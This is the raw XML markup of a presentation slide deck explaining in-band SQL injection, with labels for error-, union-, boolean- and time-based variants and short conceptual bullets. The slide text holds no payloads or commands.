                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64719" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30500" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158079"/>
                  </a:lnTo>
                  <a:close/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496898" y="9049222"/>
            <a:ext cx="118237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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr sz="44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28010" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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979367" y="9049222"/>
            <a:ext cx="141097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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr sz="44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993871" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113404" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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595896" y="9049222"/>
            <a:ext cx="1909445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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="44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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079"/>
                </a:lnTo>
                <a:close/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2625554" y="9049222"/>
            <a:ext cx="116459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260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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75006" y="7978793"/>
            <a:ext cx="11245850" cy="981075"/>
            <a:chOff x="1675006" y="7978793"/>
            <a:chExt cx="11245850" cy="981075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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06419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011201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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="8025964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90" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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434928" y="8025964"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="6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22" y="804755"/>
            <a:ext cx="9679305" cy="13436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60"/>
              <a:t>In-Band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-270"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1005"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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3465" cy="208279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20103465" h="208279">
                <a:moveTo>
                  <a:pt x="20102843" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="207951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20102843" y="207951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2010284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93451" y="2956843"/>
            <a:ext cx="16887825" cy="499491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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-250">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>occurs </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-475">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>communication  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>channel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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>both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-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>launch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-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and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 spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Retrieved </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>presented </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>directly </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-785">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="1040"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Easier </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-955">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>than </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>categories </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1170"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>common </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in-band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-535">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Error-based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440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="384"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Union-based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-440">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi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2022-02-23T15:57:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-23T15:57:31Z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2021-03-01T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2022-02-23T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>